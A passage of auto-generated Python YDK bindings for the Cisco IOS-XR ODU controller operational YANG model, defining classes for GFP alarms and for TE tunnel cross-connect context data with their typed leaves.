self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "gfp-lfd"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.GfpLfd, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.GfpLfd']['meta_info']
class GfpLocs(_Entity_):
"""
Loss Of Client Signal
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.GfpLocs, self).__init__()
self.yang_name = "gfp-locs"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "gfp-locs"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.GfpLocs, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.GfpLocs']['meta_info']
class GfpLoccs(_Entity_):
"""
Loss Of Character Synchronization
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.GfpLoccs, self).__init__()
self.yang_name = "gfp-loccs"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "gfp-loccs"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.GfpLoccs, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.GfpLoccs']['meta_info']
class GfpUpm(_Entity_):
"""
User Payload Mismatch
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.GfpUpm, self).__init__()
self.yang_name = "gfp-upm"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "gfp-upm"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.GfpUpm, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.GfpUpm']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm']['meta_info']
class TeCtxData(_Entity_):
"""
Label Get Data
.. attribute:: te_tunnel_info
Tunnel Information
**type**\: :py:class:`TeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo>`
**config**\: False
.. attribute:: gmpls_req_time
Req Time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ctxt_type
Ctxt Type
**type**\: :py:class:`OtmOpticalRmCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxt>`
**config**\: False
.. attribute:: rm_type
Rm Type
**type**\: :py:class:`OtmOpticalRmCtxtRm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxtRm>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.TeCtxData, self).__init__()
self.yang_name = "te-ctx-data"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("te-tunnel-info", ("te_tunnel_info", Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo))])
self._leafs = OrderedDict([
('gmpls_req_time', (YLeaf(YType.uint32, 'gmpls-req-time'), ['int'])),
('ctxt_type', (YLeaf(YType.enumeration, 'ctxt-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxt', '')])),
('rm_type', (YLeaf(YType.enumeration, 'rm-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxtRm', '')])),
])
self.gmpls_req_time = None
self.ctxt_type = None
self.rm_type = None
self.te_tunnel_info = Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo()
self.te_tunnel_info.parent = self
self._children_name_map["te_tunnel_info"] = "te-tunnel-info"
self._segment_path = lambda: "te-ctx-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.TeCtxData, ['gmpls_req_time', 'ctxt_type', 'rm_type'], name, value)
class TeTunnelInfo(_Entity_):
"""
Tunnel Information
.. attribute:: lb_ctxt
Lbl Ctxt
**type**\: :py:class:`LbCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt>`
**config**\: False
.. attribute:: passive_match
Passive Match
**type**\: :py:class:`PassiveMatch <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch>`
**config**\: False
.. attribute:: info_type
INFO TYPE
**type**\: :py:class:`OtmTeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmTeTunnelInfo>`
**config**\: False
.. attribute:: tunnel_id
Tunnel Id
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo, self).__init__()
self.yang_name = "te-tunnel-info"
self.yang_parent_name = "te-ctx-data"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lb-ctxt", ("lb_ctxt", Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt)), ("passive-match", ("passive_match", Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch))])
self._leafs = OrderedDict([
('info_type', (YLeaf(YType.enumeration, 'info-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmTeTunnelInfo', '')])),
('tunnel_id', (YLeaf(YType.uint32, 'tunnel-id'), ['int'])),
])
self.info_type = None
self.tunnel_id = None
self.lb_ctxt = Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt()
self.lb_ctxt.parent = self
self._children_name_map["lb_ctxt"] = "lb-ctxt"
self.passive_match = Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch()
self.passive_match.parent = self
self._children_name_map["passive_match"] = "passive-match"
self._segment_path = lambda: "te-tunnel-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo, ['info_type', 'tunnel_id'], name, value)
class LbCtxt(_Entity_):
"""
Lbl Ctxt
.. attribute:: s2l_fec_sub_group_id
SubGroup Id
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: s2l_fec_lsp_id
Lsp Id
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: s2l_fec_tunnel_id
Tunnel Id
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: ext_tunnel_id
Ext Tunnel Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_source
FEC Source
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_dest
FEC Dest
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: s2l_fec_p2mp_id
P2MP Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: sub_group_origin_ator
SubGroup Originator
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_c_type
Ctype
**type**\: :py:class:`OtmMplsLibC <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmMplsLibC>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt, self).__init__()
self.yang_name = "lb-ctxt"
self.yang_parent_name = "te-tunnel-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('s2l_fec_sub_group_id', (YLeaf(YType.uint16, 's2l-fec-sub-group-id'), ['int'])),
('s2l_fec_lsp_id', (YLeaf(YType.uint16, 's2l-fec-lsp-id'), ['int'])),
('s2l_fec_tunnel_id', (YLeaf(YType.uint16, 's2l-fec-tunnel-id'), ['int'])),
('ext_tunnel_id', (YLeaf(YType.uint32, 'ext-tunnel-id'), ['int'])),
('fec_source', (YLeaf(YType.uint32, 'fec-source'), ['int'])),
('fec_dest', (YLeaf(YType.uint32, 'fec-dest'), ['int'])),
('s2l_fec_p2mp_id', (YLeaf(YType.uint32, 's2l-fec-p2mp-id'), ['int'])),
('sub_group_origin_ator', (YLeaf(YType.uint32, 'sub-group-origin-ator'), ['int'])),
('fec_c_type', (YLeaf(YType.enumeration, 'fec-c-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmMplsLibC', '')])),
])
self.s2l_fec_sub_group_id = None
self.s2l_fec_lsp_id = None
self.s2l_fec_tunnel_id = None
self.ext_tunnel_id = None
self.fec_source = None
self.fec_dest = None
self.s2l_fec_p2mp_id = None
self.sub_group_origin_ator = None
self.fec_c_type = None
self._segment_path = lambda: "lb-ctxt"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt, ['s2l_fec_sub_group_id', 's2l_fec_lsp_id', 's2l_fec_tunnel_id', 'ext_tunnel_id', 'fec_source', 'fec_dest', 's2l_fec_p2mp_id', 'sub_group_origin_ator', 'fec_c_type'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt']['meta_info']
class PassiveMatch(_Entity_):
"""
Passive Match
.. attribute:: src_tid
Src TId
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: src_rid
Src RId
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch, self).__init__()
self.yang_name = "passive-match"
self.yang_parent_name = "te-tunnel-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('src_tid', (YLeaf(YType.uint16, 'src-tid'), ['int'])),
('src_rid', (YLeaf(YType.uint32, 'src-rid'), ['int'])),
])
self.src_tid = None
self.src_rid = None
self._segment_path = lambda: "passive-match"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch, ['src_tid', 'src_rid'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.TeCtxData']['meta_info']
class XcAddCtxData(_Entity_):
"""
Xconnect Add Data
.. attribute:: te_tunnel_info
Tunnel Information
**type**\: :py:class:`TeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo>`
**config**\: False
.. attribute:: gmpls_req_time
Req Time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ctxt_type
Ctxt Type
**type**\: :py:class:`OtmOpticalRmCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxt>`
**config**\: False
.. attribute:: rm_type
Rm Type
**type**\: :py:class:`OtmOpticalRmCtxtRm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxtRm>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.XcAddCtxData, self).__init__()
self.yang_name = "xc-add-ctx-data"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("te-tunnel-info", ("te_tunnel_info", Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo))])
self._leafs = OrderedDict([
('gmpls_req_time', (YLeaf(YType.uint32, 'gmpls-req-time'), ['int'])),
('ctxt_type', (YLeaf(YType.enumeration, 'ctxt-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxt', '')])),
('rm_type', (YLeaf(YType.enumeration, 'rm-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxtRm', '')])),
])
self.gmpls_req_time = None
self.ctxt_type = None
self.rm_type = None
self.te_tunnel_info = Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo()
self.te_tunnel_info.parent = self
self._children_name_map["te_tunnel_info"] = "te-tunnel-info"
self._segment_path = lambda: "xc-add-ctx-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.XcAddCtxData, ['gmpls_req_time', 'ctxt_type', 'rm_type'], name, value)
class TeTunnelInfo(_Entity_):
"""
Tunnel Information
.. attribute:: lb_ctxt
Lbl Ctxt
**type**\: :py:class:`LbCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt>`
**config**\: False
.. attribute:: passive_match
Passive Match
**type**\: :py:class:`PassiveMatch <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch>`
**config**\: False
.. attribute:: info_type
INFO TYPE
**type**\: :py:class:`OtmTeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmTeTunnelInfo>`
**config**\: False
.. attribute:: tunnel_id
Tunnel Id
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo, self).__init__()
self.yang_name = "te-tunnel-info"
self.yang_parent_name = "xc-add-ctx-data"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lb-ctxt", ("lb_ctxt", Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt)), ("passive-match", ("passive_match", Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch))])
self._leafs = OrderedDict([
('info_type', (YLeaf(YType.enumeration, 'info-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmTeTunnelInfo', '')])),
('tunnel_id', (YLeaf(YType.uint32, 'tunnel-id'), ['int'])),
])
self.info_type = None
self.tunnel_id = None
self.lb_ctxt = Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt()
self.lb_ctxt.parent = self
self._children_name_map["lb_ctxt"] = "lb-ctxt"
self.passive_match = Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch()
self.passive_match.parent = self
self._children_name_map["passive_match"] = "passive-match"
self._segment_path = lambda: "te-tunnel-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo, ['info_type', 'tunnel_id'], name, value)
class LbCtxt(_Entity_):
"""
Lbl Ctxt
.. attribute:: s2l_fec_sub_group_id
SubGroup Id
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: s2l_fec_lsp_id
Lsp Id
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: s2l_fec_tunnel_id
Tunnel Id
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: ext_tunnel_id
Ext Tunnel Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_source
FEC Source
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_dest
FEC Dest
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: s2l_fec_p2mp_id
P2MP Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: sub_group_origin_ator
SubGroup Originator
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_c_type
Ctype
**type**\: :py:class:`OtmMplsLibC <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmMplsLibC>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt, self).__init__()
self.yang_name = "lb-ctxt"
self.yang_parent_name = "te-tunnel-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('s2l_fec_sub_group_id', (YLeaf(YType.uint16, 's2l-fec-sub-group-id'), ['int'])),
('s2l_fec_lsp_id', (YLeaf(YType.uint16, 's2l-fec-lsp-id'), ['int'])),
('s2l_fec_tunnel_id', (YLeaf(YType.uint16, 's2l-fec-tunnel-id'), ['int'])),
('ext_tunnel_id', (YLeaf(YType.uint32, 'ext-tunnel-id'), ['int'])),
('fec_source', (YLeaf(YType.uint32, 'fec-source'), ['int'])),
('fec_dest', (YLeaf(YType.uint32, 'fec-dest'), ['int'])),
('s2l_fec_p2mp_id', (YLeaf(YType.uint32, 's2l-fec-p2mp-id'), ['int'])),
('sub_group_origin_ator', (YLeaf(YType.uint32, 'sub-group-origin-ator'), ['int'])),
('fec_c_type', (YLeaf(YType.enumeration, 'fec-c-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmMplsLibC', '')])),
])
self.s2l_fec_sub_group_id = None
self.s2l_fec_lsp_id = None
self.s2l_fec_tunnel_id = None
self.ext_tunnel_id = None
self.fec_source = None
self.fec_dest = None
self.s2l_fec_p2mp_id = None
self.sub_group_origin_ator = None
self.fec_c_type = None
self._segment_path = lambda: "lb-ctxt"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt, ['s2l_fec_sub_group_id', 's2l_fec_lsp_id', 's2l_fec_tunnel_id', 'ext_tunnel_id', 'fec_source', 'fec_dest', 's2l_fec_p2mp_id', 'sub_group_origin_ator', 'fec_c_type'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt']['meta_info']
class PassiveMatch(_Entity_):
"""
Passive Match
.. attribute:: src_tid
Src TId
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: src_rid
Src RId
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch, self).__init__()
self.yang_name = "passive-match"
self.yang_parent_name = "te-tunnel-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('src_tid', (YLeaf(YType.uint16, 'src-tid'), ['int'])),
('src_rid', (YLeaf(YType.uint32, 'src-rid'), ['int'])),
])
self.src_tid = None
self.src_rid = None
self._segment_path = lambda: "passive-match"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch, ['src_tid', 'src_rid'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.XcAddCtxData']['meta_info']
class XcRemCtxData(_Entity_):
"""
Xconnect Remove Data
.. attribute:: te_tunnel_info
Tunnel Information
**type**\: :py:class:`TeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo>`
**config**\: False
.. attribute:: gmpls_req_time
Req Time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ctxt_type
Ctxt Type
**type**\: :py:class:`OtmOpticalRmCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxt>`
**config**\: False
.. attribute:: rm_type
Rm Type
**type**\: :py:class:`OtmOpticalRmCtxtRm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxtRm>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.XcRemCtxData, self).__init__()
self.yang_name = "xc-rem-ctx-data"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("te-tunnel-info", ("te_tunnel_info", Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo))])
self._leafs = OrderedDict([
('gmpls_req_time', (YLeaf(YType.uint32, 'gmpls-req-time'), ['int'])),
('ctxt_type', (YLeaf(YType.enumeration, 'ctxt-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxt', '')])),
('rm_type', (YLeaf(YType.enumeration, 'rm-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxtRm', '')])),
])
self.gmpls_req_time = None
self.ctxt_type = None
self.rm_type = None
self.te_tunnel_info = Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo()
self.te_tunnel_info.parent = self
self._children_name_map["te_tunnel_info"] = "te-tunnel-info"
self._segment_path = lambda: "xc-rem-ctx-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.XcRemCtxData, ['gmpls_req_time', 'ctxt_type', 'rm_type'], name, value)
class TeTunnelInfo(_Entity_):
"""
Tunnel Information
.. attribute:: lb_ctxt
Lbl Ctxt
**type**\: :py:class:`LbCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt>`
**config**\: False
.. attribute:: passive_match
Passive Match
**type**\: :py:class:`PassiveMatch <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch>`
**config**\: False
.. attribute:: info_type
INFO TYPE
**type**\: :py:class:`OtmTeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmTeTunnelInfo>`
**config**\: False
.. attribute:: tunnel_id
Tunnel Id
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo, self).__init__()
self.yang_name = "te-tunnel-info"
self.yang_parent_name = "xc-rem-ctx-data"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lb-ctxt", ("lb_ctxt", Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt)), ("passive-match", ("passive_match", Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch))])
self._leafs = OrderedDict([
('info_type', (YLeaf(YType.enumeration, 'info-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmTeTunnelInfo', '')])),
('tunnel_id', (YLeaf(YType.uint32, 'tunnel-id'), ['int'])),
])
self.info_type = None
self.tunnel_id = None
self.lb_ctxt = Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt()
self.lb_ctxt.parent = self
self._children_name_map["lb_ctxt"] = "lb-ctxt"
self.passive_match = Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch()
self.passive_match.parent = self
self._children_name_map["passive_match"] = "passive-match"
self._segment_path = lambda: "te-tunnel-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo, ['info_type', 'tunnel_id'], name, value)
class LbCtxt(_Entity_):
"""
Lbl Ctxt
.. attribute:: s2l_fec_sub_group_id
SubGroup Id
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: s2l_fec_lsp_id
Lsp Id
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: s2l_fec_tunnel_id
Tunnel Id
**type**\: int
**range:** 0..65535
**config**\: False
